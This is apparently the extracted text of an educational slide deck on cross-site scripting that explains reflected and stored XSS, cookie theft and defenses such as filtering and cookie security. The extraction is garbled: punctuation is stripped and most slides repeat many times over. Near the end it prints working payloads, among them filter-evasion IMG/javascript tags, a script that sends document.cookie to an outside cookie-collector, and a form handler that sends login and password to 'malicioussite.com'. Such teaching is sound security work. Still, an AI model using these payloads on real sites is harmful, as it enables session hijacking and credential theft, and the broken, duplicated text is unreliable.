bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

